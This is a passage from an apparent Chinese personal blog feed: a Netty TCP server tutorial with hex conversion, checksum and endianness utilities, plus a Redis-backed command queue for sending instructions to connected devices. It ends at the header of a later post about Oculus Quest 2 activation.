class="line"><span class="keyword">int</span> total = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">int</span> len = data.length();</span><br><span class="line"><span class="keyword">int</span> num = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">while</span> (num < len) {</span><br><span class="line">String s = data.substring(num, num + <span class="number">2</span>);</span><br><span class="line">total += Integer.parseInt(s, <span class="number">16</span>);</span><br><span class="line">num = num + <span class="number">2</span>;</span><br><span class="line">}</span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * 用256求余最大是255,即16进制的FF</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">int</span> mod = total % <span class="number">256</span>;</span><br><span class="line">String hex = Integer.toHexString(mod);</span><br><span class="line">len = hex.length();</span><br><span class="line"><span class="comment">// 如果不够校验位的长度,补0,这里用的是两位校验</span></span><br><span class="line"><span class="keyword">if</span> (len < <span class="number">2</span>) {</span><br><span class="line">hex = <span class="string">"0"</span> + hex;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">return</span> hex;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h3><span id="创建netty-tcp服务启动类">创建netty TCP服务启动类</span></h3><p>由于我是使用的spring boot框架因此直接在初始化事件中创建netty服务,也可以直接在main方法中启动,代码如下 :</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">ServerStarter</span> <span class="keyword">implements</span> <span class="title">ApplicationListener</span><<span class="title">ContextRefreshedEvent</span>></span>{</span><br><span class="line"></span><br><span class="line">Logger logger = LoggerFactory.getLogger(getClass());</span><br><span class="line"></span><br><span class="line"><span class="meta">@Override</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">onApplicationEvent</span><span class="params">(ContextRefreshedEvent event)</span> </span>{</span><br><span class="line"> <span class="comment">//创建线程组</span></span><br><span class="line"> EventLoopGroup bossGroup = <span class="keyword">new</span> NioEventLoopGroup();</span><br><span class="line"> EventLoopGroup workerGroup = <span class="keyword">new</span> NioEventLoopGroup();</span><br><span class="line"> <span class="keyword">try</span> {</span><br><span class="line"> <span class="comment">//创建启动类</span></span><br><span class="line"> ServerBootstrap b = <span class="keyword">new</span> ServerBootstrap(); </span><br><span class="line"> b.group(bossGroup, workerGroup)</span><br><span class="line"> .channel(NioServerSocketChannel.class)</span><br><span class="line"> .childHandler(<span class="keyword">new</span> ServerInitializer())</span><br><span class="line"> .option(ChannelOption.SO_BACKLOG, <span class="number">256</span>)</span><br><span class="line"> .childOption(ChannelOption.SO_KEEPALIVE, <span class="keyword">true</span>);</span><br><span class="line"> <span class="comment">// 绑定端口</span></span><br><span class="line"> ChannelFuture f = b.bind(<span class="number">2077</span>).sync();</span><br><span class="line"> <span class="comment">// 等待服务器 socket 关闭 。</span></span><br><span class="line"> f.channel().closeFuture().sync();</span><br><span class="line"> } <span class="keyword">catch</span> (InterruptedException e) {</span><br><span class="line">e.printStackTrace();</span><br><span class="line">} <span class="keyword">finally</span> {</span><br><span class="line"> workerGroup.shutdownGracefully();</span><br><span class="line"> bossGroup.shutdownGracefully();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>OK,现在TCP服务的架子已经搭好,只需往里面填充业务代码即可。</p><h3><span id="常用的工具类">常用的工具类</span></h3><p>附上可能会用到的工具类,比如16进制转10进制,16进制转2进制等</p><p><strong>十六进制转byte[]数组</strong></p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">byte</span>[] hexStr2bytes(String hexStr) {</span><br><span class="line"><span class="keyword">if</span> (StringUtils.isEmpty(hexStr)) {</span><br><span class="line"><span class="keyword">return</span> <span class="keyword">null</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span> (hexStr.length() % <span class="number">2</span> != <span class="number">0</span>) {<span class="comment">// 长度为单数</span></span><br><span class="line">hexStr = <span class="string">"0"</span> + hexStr;<span class="comment">// 前面补0</span></span><br><span class="line">}</span><br><span class="line"><span class="keyword">char</span>[] chars = hexStr.toCharArray();</span><br><span class="line"><span class="keyword">int</span> len = chars.length / <span class="number">2</span>;</span><br><span class="line"><span class="keyword">byte</span>[] bytes = <span class="keyword">new</span> <span class="keyword">byte</span>[len];</span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i < len; i++) {</span><br><span class="line"><span class="keyword">int</span> x = i * <span class="number">2</span>;</span><br><span class="line">bytes[i] = (<span class="keyword">byte</span>) Integer.parseInt(String.valueOf(<span class="keyword">new</span> <span class="keyword">char</span>[] { chars[x], chars[x + <span class="number">1</span>] }), <span class="number">16</span>);</span><br><span class="line">}</span><br><span class="line"><span class="keyword">return</span> bytes;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p><strong>大小端处理 ,低位字节排放在内存的低地址端,高位字节排放在内存的高地址端。</strong></p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">int</span> <span class="title">toLittleEndian</span><span class="params">(<span class="keyword">int</span> a)</span> </span>{</span><br><span class="line"> <span class="keyword">return</span> (((a & <span class="number">0xFF</span>) << <span class="number">24</span>) | (((a >> <span class="number">8</span>) & <span class="number">0xFF</span>) << <span class="number">16</span>) | (((a >> <span class="number">16</span>) & <span class="number">0xFF</span>) << <span class="number">8</span>) | ((a >> <span class="number">24</span>) & <span class="number">0xFF</span>));</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p><strong>10进制数字转16进制数字</strong></p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> String <span class="title">numberToHexString</span><span class="params">(Integer number)</span> </span>{</span><br><span class="line">String hex = Integer.toHexString(number);</span><br><span class="line"><span class="keyword">if</span>(number<<span class="number">16</span>) {</span><br><span class="line">hex = <span class="string">"0"</span>+hex;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">return</span> hex;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p><strong>checksum,上面已经贴过再贴一次</strong></p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> String <span class="title">makeChecksum</span><span class="params">(String data)</span> </span>{</span><br><span class="line"><span class="keyword">if</span> (data == <span class="keyword">null</span> || data.equals(<span class="string">""</span>)) {</span><br><span class="line"><span class="keyword">return</span> <span class="string">""</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">int</span> total = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">int</span> len = data.length();</span><br><span class="line"><span class="keyword">int</span> num = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">while</span> (num < len) {</span><br><span class="line">String s = data.substring(num, num + <span class="number">2</span>);</span><br><span class="line">total += Integer.parseInt(s, <span class="number">16</span>);</span><br><span class="line">num = num + <span class="number">2</span>;</span><br><span class="line">}</span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * 用256求余最大是255,即16进制的FF</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">int</span> mod = total % <span class="number">256</span>;</span><br><span class="line">String hex = Integer.toHexString(mod);</span><br><span class="line">len = hex.length();</span><br><span class="line"><span class="comment">// 如果不够校验位的长度,补0,这里用的是两位校验</span></span><br><span class="line"><span class="keyword">if</span> (len < <span class="number">2</span>) {</span><br><span class="line">hex = <span class="string">"0"</span> + hex;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">return</span> hex;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p><strong>截取字节</strong> (这个可能是最常用的了,后来我才发现java自带的bytebuffer已经自带大小端转换功能)</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> String <span class="title">catoutByte</span><span class="params">(<span class="keyword">byte</span>[] sourceBytes,<span class="keyword">int</span> startPos,<span class="keyword">int</span> len)</span> </span>{</span><br><span class="line"><span class="keyword">byte</span>[] cbyte = <span class="keyword">new</span> <span class="keyword">byte</span>[len]; </span><br><span class="line">System.arraycopy(sourceBytes, startPos, cbyte, <span class="number">0</span>, len);<span class="comment">//截取字节</span></span><br><span class="line"><span class="comment">//使用Java bytebuff处理类包装</span></span><br><span class="line">ByteBuffer bb = ByteBuffer.wrap(cbyte);</span><br><span class="line"></span><br><span class="line"><span class="comment">//大小端转换,转换成小端模式</span></span><br><span class="line">bb.order(ByteOrder.LITTLE_ENDIAN);</span><br><span class="line">String vHex = StringUtil.toHexString(bb.array());</span><br><span class="line"><span class="keyword">return</span> vHex;</span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></table></figure><h1><span id="使用redis作为设备指令发送队列">使用Redis作为设备指令发送队列</span></h1><p>更新日期:2021-7-7 ,新增使用redis作简单队列,发送指令到设备。</p><p><strong>此方式需要可容忍指令丢失,因为有可以在取出指令后服务器挂掉或一直未获取到锁导致指令超时,可靠消息列队应当使用队列中间件</strong></p><p><strong>首先在你的发送指令类的构造函数中创建一个线程池,在指令并发较大时可以有效节省资源</strong></p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">ExecutorService pool;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="title">Commander</span><span class="params">()</span> </span>{</span><br><span class="line">pool = Executors.newFixedThreadPool(<span class="number">35</span>);<span class="comment">//参数看情况具体设定</span></span><br><span class="line"><span class="comment">//检查队列命令专用线程,该线程不可结束</span></span><br><span class="line">pool.execute(()->sendCommandByQueen(<span class="keyword">false</span>));</span><br><span class="line">}</span><br></pre></td></tr></table></figure><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@Title</span>: sendCommandByQueue</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@Description</span>: 从队列中获取指令并排队发送</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@author</span> reiner_shir</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@date</span> 2021年7月7日</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@param</span> canOver 是否可以在没有指令时结束循环</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@return</span></span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title">sendCommandByQueue</span><span class="params">(<span class="keyword">boolean</span> canOver)</span> </span>{</span><br><span class="line"><span class="keyword">do</span> {</span><br><span class="line"><span class="comment">//从队列中取指令</span></span><br><span class="line">String commandStr = canOver?redisTemplate.opsForList().rightPop(REDIS_COMMAND_LIST):</span><br><span class="line">redisTemplate.opsForList().rightPop(REDIS_COMMAND_LIST,<span class="number">0</span>,TimeUnit.SECONDS);</span><br><span class="line"><span class="keyword">if</span>(StringUtils.isEmpty(commandStr)) {</span><br><span class="line"><span class="keyword">if</span>(canOver) {</span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="comment">//读取队列中的命令</span></span><br><span class="line">Command command=<span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">try</span> {</span><br><span class="line"> <span class="comment">//json转对象</span></span><br><span class="line">command = JacksonUtil.readValue(commandStr, Command.class);</span><br><span class="line">} <span class="keyword">catch</span> (Exception e) {</span><br><span class="line">logger.error(<span class="string">"指令内容转换出错:{}"</span>,command,e);</span><br><span class="line"><span class="keyword">continue</span>;</span><br><span class="line">}</span><br><span class="line">String deviceId = command.getDeviceId();</span><br><span class="line">String actionCode = command.getActionCode();</span><br><span class="line">String responseData= command.getResponseData();</span><br><span class="line"><span class="keyword">long</span> time = command.getTime();</span><br><span class="line"><span class="keyword">if</span>(!NettyChannelManager.hasKey(deviceId)) {</span><br><span class="line">logger.warn(<span class="string">"错误的指令请求,该设备未连接,设备号:{}"</span>,deviceId);</span><br><span class="line"><span class="keyword">continue</span>;</span><br><span class="line">}</span><br><span class="line">String key = Contract.COMMAND_REDIS_KEY+deviceId;</span><br><span class="line">pool.execute(()->{</span><br><span class="line"><span class="keyword">boolean</span> flag = <span class="keyword">false</span>;</span><br><span class="line"><span class="keyword">do</span> {</span><br><span class="line"><span class="keyword">long</span> nowTime = System.currentTimeMillis();</span><br><span class="line"><span class="comment">//判断队列中的指令是否超时</span></span><br><span class="line"><span class="keyword">if</span>(((nowTime-time)/<span class="number">1000</span>)><span class="number">15</span>) {</span><br><span class="line">logger.warn(<span class="string">"指令已超时:指令内容:{},功能码:{},发送的设备号:{},超时时间:{}"</span>,responseData,actionCode,deviceId,((nowTime-time)/<span class="number">1000</span>));</span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line">}</span><br><span class="line"><span class="comment">//判断该设备是否有正在发送中的指令,指令状态失效时间为7秒</span></span><br><span class="line"><span class="keyword">if</span>(redisTemplate.opsForValue().setIfAbsent(key, <span class="string">"1"</span>, <span class="number">7</span>, TimeUnit.SECONDS)) {</span><br><span class="line"><span class="comment">//deviceId = command.getDeviceId();</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//如果没有正在发送中的指令,占用锁发送指令</span></span><br><span class="line">sendCommand(deviceId,actionCode,responseData);</span><br><span class="line">flag = <span class="keyword">true</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">try</span> {</span><br><span class="line"><span class="comment">//否则睡眠一秒再检查</span></span><br><span class="line">Thread.sleep(<span class="number">400l</span>);</span><br><span class="line">} <span class="keyword">catch</span> (InterruptedException e) {</span><br><span class="line">e.printStackTrace();</span><br><span class="line">}</span><br><span class="line">}<span class="keyword">while</span>(!flag);</span><br><span class="line">});</span><br><span class="line">}<span class="keyword">while</span>(<span class="keyword">true</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">private</span> <span class="keyword">final</span> String REDIS_COMMAND_LIST=<span class="string">"REDIS_COMMAND_QUEUE_LIST"</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">*</span></span><br><span class="line"><span class="comment">*对外调用此方法</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">boolean</span> <span class="title">pushCommand</span><span class="params">(String deviceId,String responseData)</span> </span>{</span><br><span class="line">Command command = <span class="keyword">new</span> Command();</span><br><span class="line">command.setDeviceId(deviceId);</span><br><span class="line">command.setResponseData(responseData);</span><br><span class="line">command.setTime(<span class="keyword">new</span> Date().getTime());</span><br><span class="line"><span class="comment">//放入队列</span></span><br><span class="line"><span class="keyword">boolean</span> r = redisTemplate.opsForList().leftPush(REDIS_COMMAND_LIST, JacksonUtil.toJSon(command))><span class="number">0</span>?<span class="keyword">true</span>:<span class="keyword">false</span>;</span><br><span class="line"><span class="comment">//每超过10条指令创建一个可结束的执行指令线程</span></span><br><span class="line"><span class="keyword">long</span> size = redisTemplate.opsForList().size(REDIS_COMMAND_LIST);</span><br><span class="line"><span class="keyword">if</span>(size>=<span class="number">20</span>&&size%<span class="number">20</span>==<span class="number">0</span>) {</span><br><span class="line">logger.info(<span class="string">"当前队列指令条数:{} mod:{}"</span>,size,size%<span class="number">20</span>);</span><br><span class="line">pool.execute(()->sendCommandByQueue(<span class="keyword">true</span>));</span><br><span class="line">}</span><br><span class="line"><span class="keyword">return</span> r;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">private</span> <span class="keyword">boolean</span> <span class="title">sendCommand</span><span class="params">(String deviceId,String responseData)</span> </span>{</span><br><span class="line">Channel channel = NettyChannelManager.getChannel(deviceId);</span><br><span class="line"><span class="keyword">if</span>(channel!=<span class="keyword">null</span>) {</span><br><span class="line"> <span class="comment">//将16进制指令转换成字节</span></span><br><span class="line"><span class="keyword">byte</span>[] resp = TCPServerUtils.makeResponse(responseData);</span><br><span class="line"></span><br><span class="line"><span class="comment">//把发送的消息缓存起来,等待客户端的响应</span></span><br><span class="line">NettyChannelManager.putSendMessage(channel,resp,responseData);</span><br><span class="line"></span><br><span class="line"><span class="comment">//发送指令</span></span><br><span class="line">channel.writeAndFlush(resp);</span><br><span class="line"></span><br><span class="line"><span class="comment">//每1.5秒后检查是否已经收到了回复,共检查3次</span></span><br><span class="line">Timer timer = <span class="keyword">new</span> Timer();</span><br><span class="line">timer.schedule(<span class="keyword">new</span> TimerTask() {</span><br><span class="line"><span class="meta">@Override</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">run</span><span class="params">()</span> </span>{</span><br><span class="line">SendMessage checkMessage = NettyChannelManager.getSendMessageByParamter(channel);</span><br><span class="line"><span class="keyword">if</span>(checkMessage!=<span class="keyword">null</span>) {</span><br><span class="line"><span class="keyword">if</span> (checkMessage.getTimes() <= <span class="number">3</span>) </span><br><span class="line">{</span><br><span class="line">checkMessage.setTimes(checkMessage.getTimes()+<span class="number">1</span>);</span><br><span class="line"><span class="keyword">byte</span>[] data = (<span class="keyword">byte</span>[]) checkMessage.getData();</span><br><span class="line"><span class="comment">//如果没有收到回复,则重新发送</span></span><br><span class="line">TCPServerUtils.writeAndFlush(channel, data);</span><br><span class="line">}<span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">//移除发送中的消息</span></span><br><span class="line">NettyChannelManager.removeSendMessageAndRedisMsg(channel);</span><br><span class="line"><span class="comment">//超过3次就不管了</span></span><br><span class="line">timer.cancel();</span><br><span class="line">}</span><br><span class="line">}<span class="keyword">else</span> {</span><br><span class="line">timer.cancel();</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}, <span class="number">3000l</span>,<span class="number">1500l</span>);<span class="comment">//3秒后才检查是为了留出上报状态的时间,上报成功后会移除SendMessage</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>可调用<code>public boolean pushCommand(String deviceId,String responseData) </code> 方法将指令放入队列,等待获取指令列队的线程执行。</p><p>指令实体类:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Command</span> </span>{</span><br><span class="line"></span><br><span class="line"><span class="keyword">private</span> String deviceId;</span><br><span class="line"><span class="keyword">private</span> String actionCode;</span><br><span class="line"><span class="keyword">private</span> String responseData;</span><br><span class="line"><span class="keyword">private</span> Long time;</span><br><span class="line"><span class="function"><span class="keyword">public</span> String <span class="title">getDeviceId</span><span class="params">()</span> </span>{</span><br><span class="line"><span class="keyword">return</span> deviceId;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setDeviceId</span><span class="params">(String deviceId)</span> </span>{</span><br><span class="line"><span class="keyword">this</span>.deviceId = deviceId;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> String <span class="title">getActionCode</span><span class="params">()</span> </span>{</span><br><span class="line"><span class="keyword">return</span> actionCode;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setActionCode</span><span class="params">(String actionCode)</span> </span>{</span><br><span class="line"><span class="keyword">this</span>.actionCode = actionCode;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">public</span> String <span class="title">getResponseData</span><span class="params">()</span> </span>{</span><br><span class="line"><span class="keyword">return</span> responseData;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setResponseData</span><span class="params">(String responseData)</span> </span>{</span><br><span class="line"><span class="keyword">this</span>.responseData = responseData;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">public</span> Long <span class="title">getTime</span><span class="params">()</span> </span>{</span><br><span class="line"><span class="keyword">return</span> time;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setTime</span><span class="params">(Long time)</span> </span>{</span><br><span class="line"><span class="keyword">this</span>.time = time;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></table></figure><h1><span id="结尾">结尾</span></h1><p>最后一个注意点,一定要做重试机制,TCP传输过程中很可能会丢包,我目前的做法是在发送消息成功后保存一个临时的缓存,当接收到客户端回复后将缓存移除,如若一直未接收到回复(比如1秒后)则再次重新发送。</p>]]></content>
<summary type="html"><h1 id="说明"><a href="#说明" class="headerlink" title="说明"></a>说明</h1><p>本文记录了在使用netty作为TCP服务端的情况下,如何解决TCP粘包、半包问题,以及如何使用16进制与客户端进行通信。</p>
<h1 id="依赖"><a href="#依赖" class="headerlink" title="依赖"></a>依赖</h1><p>首先添加maven依赖:</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>io.netty<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>netty-all<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br></pre></td></tr></table></figure>
<h1 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h1><h3 id="创建字节转换类"><a href="#创建字节转换类" class="headerlink" title="创建字节转换类"></a>创建字节转换类</h3><p>首先创建一个将字节转换为16进制的处理类,并判断包头包尾是否正确。</p></summary>
<category term="JAVA" scheme="https://reiner.host/categories/JAVA/"/>
<category term="netty" scheme="https://reiner.host/tags/netty/"/>
<category term="TCP服务端" scheme="https://reiner.host/tags/TCP%E6%9C%8D%E5%8A%A1%E7%AB%AF/"/>
<category term="TCP粘包" scheme="https://reiner.host/tags/TCP%E7%B2%98%E5%8C%85/"/>
<category term="TCP半包" scheme="https://reiner.host/tags/TCP%E5%8D%8A%E5%8C%85/"/>
<category term="16进制通信" scheme="https://reiner.host/tags/16%E8%BF%9B%E5%88%B6%E9%80%9A%E4%BF%A1/"/>
</entry>
<entry>
<title>OculusQuest2激活教程(无需智能路由器)</title>
<link href="https://reiner.host/posts/397a07c0.html"/>
<id>https://reiner.host/posts/397a07c0.html</id>
<published>2021-03-19T06:17:10.000Z</published>
<updated>2021-12-24T12:18:32.973Z</updated>
